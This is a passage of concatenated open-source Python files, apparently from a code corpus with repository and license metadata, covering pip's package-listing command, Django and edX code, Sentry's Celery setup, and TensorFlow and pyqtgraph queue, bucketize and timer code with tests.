BaseDatabaseWrapper.__init__ = _init
BaseDatabaseWrapper.validate_thread_sharing = \
_validate_thread_sharing
patch_thread_ident.called = True
except ImportError:
pass
patch_thread_ident()
class SentryTask(Task):
def apply_async(self, *args, **kwargs):
with metrics.timer('jobs.delay', instance=self.name):
return Task.apply_async(self, *args, **kwargs)
class SentryCelery(Celery):
task_cls = SentryTask
def on_configure(self):
from raven.contrib.django.models import client
from raven.contrib.celery import register_signal, register_logger_signal
# register a custom filter to filter out duplicate logs
register_logger_signal(client)
# hook into the Celery error handler
register_signal(client)
app = SentryCelery('sentry')
app.config_from_object(settings)
app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
| bsd-3-clause |
raajitr/django_hangman | env/lib/python2.7/site-packages/pip/commands/list.py | 339 | 11369 | from __future__ import absolute_import
import json
import logging
import warnings
try:
from itertools import zip_longest
except ImportError:
from itertools import izip_longest as zip_longest
from pip._vendor import six
from pip.basecommand import Command
from pip.exceptions import CommandError
from pip.index import PackageFinder
from pip.utils import (
get_installed_distributions, dist_is_editable)
from pip.utils.deprecation import RemovedInPip10Warning
from pip.cmdoptions import make_option_group, index_group
logger = logging.getLogger(__name__)
class ListCommand(Command):
"""
List installed packages, including editables.
Packages are listed in a case-insensitive sorted order.
"""
name = 'list'
usage = """
%prog [options]"""
summary = 'List installed packages.'
def __init__(self, *args, **kw):
super(ListCommand, self).__init__(*args, **kw)
cmd_opts = self.cmd_opts
cmd_opts.add_option(
'-o', '--outdated',
action='store_true',
default=False,
help='List outdated packages')
cmd_opts.add_option(
'-u', '--uptodate',
action='store_true',
default=False,
help='List uptodate packages')
cmd_opts.add_option(
'-e', '--editable',
action='store_true',
default=False,
help='List editable projects.')
cmd_opts.add_option(
'-l', '--local',
action='store_true',
default=False,
help=('If in a virtualenv that has global access, do not list '
'globally-installed packages.'),
)
self.cmd_opts.add_option(
'--user',
dest='user',
action='store_true',
default=False,
help='Only output packages installed in user-site.')
cmd_opts.add_option(
'--pre',
action='store_true',
default=False,
help=("Include pre-release and development versions. By default, "
"pip only finds stable versions."),
)
cmd_opts.add_option(
'--format',
action='store',
dest='list_format',
choices=('legacy', 'columns', 'freeze', 'json'),
help="Select the output format among: legacy (default), columns, "
"freeze or json.",
)
cmd_opts.add_option(
'--not-required',
action='store_true',
dest='not_required',
help="List packages that are not dependencies of "
"installed packages.",
)
index_opts = make_option_group(index_group, self.parser)
self.parser.insert_option_group(0, index_opts)
self.parser.insert_option_group(0, cmd_opts)
def _build_package_finder(self, options, index_urls, session):
"""
Create a package finder appropriate to this list command.
"""
return PackageFinder(
find_links=options.find_links,
index_urls=index_urls,
allow_all_prereleases=options.pre,
trusted_hosts=options.trusted_hosts,
process_dependency_links=options.process_dependency_links,
session=session,
)
def run(self, options, args):
if options.allow_external:
warnings.warn(
"--allow-external has been deprecated and will be removed in "
"the future. Due to changes in the repository protocol, it no "
"longer has any effect.",
RemovedInPip10Warning,
)
if options.allow_all_external:
warnings.warn(
"--allow-all-external has been deprecated and will be removed "
"in the future. Due to changes in the repository protocol, it "
"no longer has any effect.",
RemovedInPip10Warning,
)
if options.allow_unverified:
warnings.warn(
"--allow-unverified has been deprecated and will be removed "
"in the future. Due to changes in the repository protocol, it "
"no longer has any effect.",
RemovedInPip10Warning,
)
if options.list_format is None:
warnings.warn(
"The default format will switch to columns in the future. "
"You can use --format=(legacy|columns) (or define a "
"format=(legacy|columns) in your pip.conf under the [list] "
"section) to disable this warning.",
RemovedInPip10Warning,
)
if options.outdated and options.uptodate:
raise CommandError(
"Options --outdated and --uptodate cannot be combined.")
packages = get_installed_distributions(
local_only=options.local,
user_only=options.user,
editables_only=options.editable,
)
if options.outdated:
packages = self.get_outdated(packages, options)
elif options.uptodate:
packages = self.get_uptodate(packages, options)
if options.not_required:
packages = self.get_not_required(packages, options)
self.output_package_listing(packages, options)
def get_outdated(self, packages, options):
return [
dist for dist in self.iter_packages_latest_infos(packages, options)
if dist.latest_version > dist.parsed_version
]
def get_uptodate(self, packages, options):
return [
dist for dist in self.iter_packages_latest_infos(packages, options)
if dist.latest_version == dist.parsed_version
]
def get_not_required(self, packages, options):
dep_keys = set()
for dist in packages:
dep_keys.update(requirement.key for requirement in dist.requires())
return set(pkg for pkg in packages if pkg.key not in dep_keys)
def iter_packages_latest_infos(self, packages, options):
index_urls = [options.index_url] + options.extra_index_urls
if options.no_index:
logger.debug('Ignoring indexes: %s', ','.join(index_urls))
index_urls = []
dependency_links = []
for dist in packages:
if dist.has_metadata('dependency_links.txt'):
dependency_links.extend(
dist.get_metadata_lines('dependency_links.txt'),
)
with self._build_session(options) as session:
finder = self._build_package_finder(options, index_urls, session)
finder.add_dependency_links(dependency_links)
for dist in packages:
typ = 'unknown'
all_candidates = finder.find_all_candidates(dist.key)
if not options.pre:
# Remove prereleases
all_candidates = [candidate for candidate in all_candidates
if not candidate.version.is_prerelease]
if not all_candidates:
continue
best_candidate = max(all_candidates,
key=finder._candidate_sort_key)
remote_version = best_candidate.version
if best_candidate.location.is_wheel:
typ = 'wheel'
else:
typ = 'sdist'
# This is dirty but makes the rest of the code much cleaner
dist.latest_version = remote_version
dist.latest_filetype = typ
yield dist
def output_legacy(self, dist):
if dist_is_editable(dist):
return '%s (%s, %s)' % (
dist.project_name,
dist.version,
dist.location,
)
else:
return '%s (%s)' % (dist.project_name, dist.version)
def output_legacy_latest(self, dist):
return '%s - Latest: %s [%s]' % (
self.output_legacy(dist),
dist.latest_version,
dist.latest_filetype,
)
def output_package_listing(self, packages, options):
packages = sorted(
packages,
key=lambda dist: dist.project_name.lower(),
)
if options.list_format == 'columns' and packages:
data, header = format_for_columns(packages, options)
self.output_package_listing_columns(data, header)
elif options.list_format == 'freeze':
for dist in packages:
logger.info("%s==%s", dist.project_name, dist.version)
elif options.list_format == 'json':
logger.info(format_for_json(packages, options))
else: # legacy
for dist in packages:
if options.outdated:
logger.info(self.output_legacy_latest(dist))
else:
logger.info(self.output_legacy(dist))
def output_package_listing_columns(self, data, header):
# insert the header first: we need to know the size of column names
if len(data) > 0:
data.insert(0, header)
pkg_strings, sizes = tabulate(data)
# Create and add a separator.
if len(data) > 0:
pkg_strings.insert(1, " ".join(map(lambda x: '-' * x, sizes)))
for val in pkg_strings:
logger.info(val)
def tabulate(vals):
# From pfmoore on GitHub:
# https://github.com/pypa/pip/issues/3651#issuecomment-216932564
assert len(vals) > 0
sizes = [0] * max(len(x) for x in vals)
for row in vals:
sizes = [max(s, len(str(c))) for s, c in zip_longest(sizes, row)]
result = []
for row in vals:
display = " ".join([str(c).ljust(s) if c is not None else ''
for s, c in zip_longest(sizes, row)])
result.append(display)
return result, sizes
def format_for_columns(pkgs, options):
"""
Convert the package data into something usable
by output_package_listing_columns.
"""
running_outdated = options.outdated
# Adjust the header for the `pip list --outdated` case.
if running_outdated:
header = ["Package", "Version", "Latest", "Type"]
else:
header = ["Package", "Version"]
data = []
if any(dist_is_editable(x) for x in pkgs):
header.append("Location")
for proj in pkgs:
# if we're working on the 'outdated' list, separate out the
# latest_version and type
row = [proj.project_name, proj.version]
if running_outdated:
row.append(proj.latest_version)
row.append(proj.latest_filetype)
if dist_is_editable(proj):
row.append(proj.location)
data.append(row)
return data, header
def format_for_json(packages, options):
data = []
for dist in packages:
info = {
'name': dist.project_name,
'version': six.text_type(dist.version),
}
if options.outdated:
info['latest_version'] = six.text_type(dist.latest_version)
info['latest_filetype'] = dist.latest_filetype
data.append(info)
return json.dumps(data)
| mit |
philanthropy-u/edx-platform | lms/djangoapps/teams/management/commands/tests/test_reindex_course_team.py | 13 | 3583 | """
Tests for course_team reindex command
"""
import ddt
from django.core.management import CommandError, call_command
from mock import patch
from opaque_keys.edx.keys import CourseKey
from search.search_engine_base import SearchEngine
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from ....search_indexes import CourseTeamIndexer
from ....tests.factories import CourseTeamFactory
COURSE_KEY1 = CourseKey.from_string('edx/history/1')
@ddt.ddt
class ReindexCourseTeamTest(SharedModuleStoreTestCase):
"""
Tests for the ReindexCourseTeam command
"""
shard = 4
def setUp(self):
"""
Set up tests.
"""
super(ReindexCourseTeamTest, self).setUp()
self.team1 = CourseTeamFactory(course_id=COURSE_KEY1, team_id='team1')
self.team2 = CourseTeamFactory(course_id=COURSE_KEY1, team_id='team2')
self.team3 = CourseTeamFactory(course_id=COURSE_KEY1, team_id='team3')
self.search_engine = SearchEngine.get_search_engine(index='index_course_team')
def test_given_no_arguments_raises_command_error(self):
"""
Test that raises CommandError for incorrect arguments.
"""
with self.assertRaisesRegexp(CommandError, '.*At least one course_team_id or --all needs to be specified.*'):
call_command('reindex_course_team')
def test_given_conflicting_arguments_raises_command_error(self):
"""
Test that raises CommandError for incorrect arguments.
"""
with self.assertRaisesRegexp(CommandError, '.*Course teams cannot be specified when --all is also specified.*'):
call_command('reindex_course_team', self.team1.team_id, all=True)
@patch.dict('django.conf.settings.FEATURES', {'ENABLE_TEAMS': False})
def test_teams_search_flag_disabled_raises_command_error(self):
"""
Test that raises CommandError for disabled feature flag.
"""
with self.assertRaisesRegexp(CommandError, '.*ENABLE_TEAMS must be enabled.*'):
call_command('reindex_course_team', self.team1.team_id)
def test_given_invalid_team_id_raises_command_error(self):
"""
Test that raises CommandError for invalid team id.
"""
team_id = u'team4'
error_str = 'Argument {} is not a course_team team_id'.format(team_id)
with self.assertRaisesRegexp(CommandError, error_str):
call_command('reindex_course_team', team_id)
@patch.object(CourseTeamIndexer, 'index')
def test_single_team_id(self, mock_index):
"""
Test that command indexes a single passed team.
"""
call_command('reindex_course_team', self.team1.team_id)
mock_index.assert_called_once_with(self.team1)
mock_index.reset_mock()
@patch.object(CourseTeamIndexer, 'index')
def test_multiple_team_id(self, mock_index):
"""
Test that command indexes multiple passed teams.
"""
call_command('reindex_course_team', self.team1.team_id, self.team2.team_id)
mock_index.assert_any_call(self.team1)
mock_index.assert_any_call(self.team2)
mock_index.reset_mock()
@patch.object(CourseTeamIndexer, 'index')
def test_all_teams(self, mock_index):
"""
Test that command indexes all teams.
"""
call_command('reindex_course_team', all=True)
mock_index.assert_any_call(self.team1)
mock_index.assert_any_call(self.team2)
mock_index.assert_any_call(self.team3)
mock_index.reset_mock()
| agpl-3.0 |
zhaodelong/django | django/core/mail/backends/base.py | 577 | 1573 | """Base email backend class."""
class BaseEmailBackend(object):
"""
Base class for email backend implementations.
Subclasses must at least overwrite send_messages().
open() and close() can be called indirectly by using a backend object as a
context manager:
with backend as connection:
# do something with connection
pass
"""
def __init__(self, fail_silently=False, **kwargs):
self.fail_silently = fail_silently
def open(self):
"""Open a network connection.
This method can be overwritten by backend implementations to
open a network connection.
It's up to the backend implementation to track the status of
a network connection if it's needed by the backend.
This method can be called by applications to force a single
network connection to be used when sending mails. See the
send_messages() method of the SMTP backend for a reference
implementation.
The default implementation does nothing.
"""
pass
def close(self):
"""Close a network connection."""
pass
def __enter__(self):
self.open()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def send_messages(self, email_messages):
"""
Sends one or more EmailMessage objects and returns the number of email
messages sent.
"""
raise NotImplementedError('subclasses of BaseEmailBackend must override send_messages() method')
| bsd-3-clause |
dendisuhubdy/tensorflow | tensorflow/compiler/tests/bucketize_op_test.py | 7 | 2995 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for bucketize_op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.compiler.tests.xla_test import XLATestCase
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
class BucketizationOpTest(XLATestCase):
def testInt(self):
with self.test_session() as sess:
p = array_ops.placeholder(dtypes.int32)
with self.test_scope():
op = math_ops._bucketize(p, boundaries=[0, 3, 8, 11])
expected_out = [0, 1, 1, 2, 2, 3, 3, 4, 4]
self.assertAllEqual(expected_out,
sess.run(op, {p: [-5, 0, 2, 3, 5, 8, 10, 11, 12]}))
def testFloat(self):
with self.test_session() as sess:
p = array_ops.placeholder(dtypes.float32)
with self.test_scope():
op = math_ops._bucketize(p, boundaries=[0., 3., 8., 11.])
expected_out = [0, 1, 1, 2, 2, 3, 3, 4, 4]
self.assertAllEqual(
expected_out,
sess.run(op, {p: [-5., 0., 2., 3., 5., 8., 10., 11., 12.]}))
def test2DInput(self):
with self.test_session() as sess:
p = array_ops.placeholder(dtypes.float32)
with self.test_scope():
op = math_ops._bucketize(p, boundaries=[0, 3, 8, 11])
expected_out = [[0, 1, 1, 2, 2], [3, 3, 4, 4, 1]]
self.assertAllEqual(
expected_out, sess.run(op,
{p: [[-5, 0, 2, 3, 5], [8, 10, 11, 12, 0]]}))
def testInvalidBoundariesOrder(self):
with self.test_session() as sess:
p = array_ops.placeholder(dtypes.int32)
with self.test_scope():
op = math_ops._bucketize(p, boundaries=[0, 8, 3, 11])
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
"Expected sorted boundaries"):
sess.run(op, {p: [-5, 0]})
def testBoundariesNotList(self):
with self.test_session():
with self.assertRaisesRegexp(TypeError, "Expected list.*"):
p = array_ops.placeholder(dtypes.int32)
with self.test_scope():
math_ops._bucketize(p, boundaries=0)
if __name__ == "__main__":
test.main()
| apache-2.0 |
robertsj/poropy | pyqtgraph/ThreadsafeTimer.py | 1 | 1600 | from pyqtgraph.Qt import QtCore, QtGui
class ThreadsafeTimer(QtCore.QObject):
"""
Thread-safe replacement for QTimer.
"""
timeout = QtCore.Signal()
sigTimerStopRequested = QtCore.Signal()
sigTimerStartRequested = QtCore.Signal(object)
def __init__(self):
QtCore.QObject.__init__(self)
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.timerFinished)
self.timer.moveToThread(QtCore.QCoreApplication.instance().thread())
self.moveToThread(QtCore.QCoreApplication.instance().thread())
self.sigTimerStopRequested.connect(self.stop, QtCore.Qt.QueuedConnection)
self.sigTimerStartRequested.connect(self.start, QtCore.Qt.QueuedConnection)
def start(self, timeout):
isGuiThread = QtCore.QThread.currentThread() == QtCore.QCoreApplication.instance().thread()
if isGuiThread:
#print "start timer", self, "from gui thread"
self.timer.start(timeout)
else:
#print "start timer", self, "from remote thread"
self.sigTimerStartRequested.emit(timeout)
def stop(self):
isGuiThread = QtCore.QThread.currentThread() == QtCore.QCoreApplication.instance().thread()
if isGuiThread:
#print "stop timer", self, "from gui thread"
self.timer.stop()
else:
#print "stop timer", self, "from remote thread"
self.sigTimerStopRequested.emit()
def timerFinished(self):
self.timeout.emit() | mit |
allenlavoie/tensorflow | tensorflow/python/kernel_tests/random/random_shuffle_queue_test.py | 19 | 50578 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.Queue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
class RandomShuffleQueueTest(test.TestCase):
def setUp(self):
# Useful for debugging when a test times out.
super(RandomShuffleQueueTest, self).setUp()
tf_logging.error("Starting: %s", self._testMethodName)
def tearDown(self):
super(RandomShuffleQueueTest, self).tearDown()
tf_logging.error("Finished: %s", self._testMethodName)
def testEnqueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
self.assertAllEqual(0, q.size().eval())
enqueue_op.run()
self.assertAllEqual(1, q.size().eval())
def testEnqueueWithShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=tensor_shape.TensorShape([3, 2]))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
self.assertAllEqual(1, q.size().eval())
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
def testEnqueueManyWithShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertAllEqual(4, q.size().eval())
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shapes=tensor_shape.TensorShape([3]))
q2.enqueue(([1, 2, 3],))
q2.enqueue_many(([[1, 2, 3]],))
def testScalarShapes(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (1,)])
q.enqueue_many([[1, 2, 3, 4], [[5], [6], [7], [8]]]).run()
q.enqueue([9, [10]]).run()
dequeue_t = q.dequeue()
results = []
for _ in range(2):
a, b = sess.run(dequeue_t)
results.append((a, b))
a, b = sess.run(q.dequeue_many(3))
for i in range(3):
results.append((a[i], b[i]))
self.assertItemsEqual([(1, [5]), (2, [6]), (3, [7]), (4, [8]), (9, [10])],
results)
def testParallelEnqueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
sess.run(enqueue_op)
threads = [
self.checkedThread(
target=enqueue, args=(e,)) for e in enqueue_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
vals = [dequeued_t.eval() for _ in xrange(len(elems))]
self.assertItemsEqual(elems, vals)
def testEnqueueAndBlockingDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(3, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
sess.run(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(sess.run(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, results)
def testMultiEnqueueAndDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.int32, dtypes_lib.float32))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
results = []
for _ in xrange(len(elems)):
x, y = sess.run(dequeued_t)
results.append((x, y))
self.assertItemsEqual(elems, results)
def testQueueSizeEmpty(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
self.assertEqual(0, q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual([1], size.eval())
dequeued_t.op.run()
self.assertEqual([0], size.eval())
def testEnqueueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + elems, results)
def testEmptyEnqueueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
empty_t = constant_op.constant(
[], dtype=dtypes_lib.float32, shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual(0, size_t.eval())
enqueue_op.run()
self.assertEqual(0, size_t.eval())
def testEmptyDequeueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testEmptyDequeueUpTo(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_up_to(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testEmptyDequeueManyWithNoShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_many(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueMany
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
def testEmptyDequeueUpToWithNoShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_up_to(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueUpTo
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
def testMultiEnqueueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
float_val, int_val = sess.run(dequeued_t)
results.append((float_val, [int_val[0], int_val[1]]))
expected = list(zip(float_elems, int_elems)) * 2
self.assertItemsEqual(expected, results)
def testDequeueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(5)
enqueue_op.run()
results = dequeued_t.eval().tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testDequeueUpToNoBlocking(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(5)
enqueue_op.run()
results = dequeued_t.eval().tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testMultiDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = sess.run(dequeued_t)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testMultiDequeueUpToNoBlocking(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_up_to(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = sess.run(dequeued_t)
# dequeue_up_to has undefined shape.
self.assertEqual([None], dequeued_t[0].get_shape().as_list())
self.assertEqual([None, 2], dequeued_t[1].get_shape().as_list())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testHighDimension(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.int32, (
(4, 4, 4, 4)))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertItemsEqual(dequeued_t.eval().tolist(), elems.tolist())
def testParallelEnqueueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
sess.run(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpTo(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
